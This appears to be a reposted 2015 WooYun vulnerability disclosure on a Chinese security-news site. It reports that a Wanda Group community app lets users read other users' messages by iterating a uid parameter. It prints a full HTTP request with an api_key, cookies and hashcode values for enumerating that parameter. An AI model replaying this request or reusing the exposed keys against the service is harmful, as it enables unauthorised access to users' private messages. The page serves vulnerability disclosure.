记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

大连万达集团某APP设计缺陷修复不完善可再次查看用户消息

2015-12-17 01:00
漏洞标题 大连万达集团某APP设计缺陷修复不完善可再次查看用户消息
相关厂商 大连万达集团股份有限公司
漏洞作者 高小厨
提交时间 2015-10-30 15:21
公开时间 2015-12-16 18:22
漏洞类型 设计缺陷/逻辑错误
危害等级
自评Rank 20
漏洞状态 厂商已经确认
Tags标签 设计缺陷

漏洞详情

1.万达社区(又名万达笑脸墙)

2.遍历点(遍历uid就可以了)

6.png

GET http://smile.wanda.cn/app/oauth/advice?count=0&page=0&t=1446172201.354999&uid=§66609§ HTTP/1.1
Host: smile.wanda.cn
User-Agent: FaceWall/3.0 CFNetwork/711.4.6 Darwin/14.0.0
Accept-Language: zh-cn
Connection: keep-alive
Accept: */*
api_key: efcb88285b5eca212614bf4bb0a61e52
version: 3.7
Connection: keep-alive
Cookie: Accept-Encoding=gzip; api_key=efcb88285b5eca212614bf4bb0a61e52; clientid=ios; hashcode=ruantongefcb88285b5eca212614bf4bb0a61e52; headpic=http://image.wanda.cn/smile/upload/mobile/2014/05/23/20140523112010_150.jpg; realname=zhj; sex=1; uid=66689; unit=wanda; user_name=ruantong; version=3.7
user_name: ruantong
clientid: ios
hashcode: 97ae6ebb3232fa5bd87e4a6ed24a665d
Accept-Encoding: gzip

漏洞证明:

1.png

2.png

3.png

5.png

修复方案:

修改消息处越权

版权声明:转载请注明来源 高小厨@乌云

知识来源: www.secpulse.com/archives/42009.html

阅读:113426 | 评论:0 | 标签:漏洞 设计缺陷

想收藏或者和大家分享这篇好文章→复制链接地址

“大连万达集团某APP设计缺陷修复不完善可再次查看用户消息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云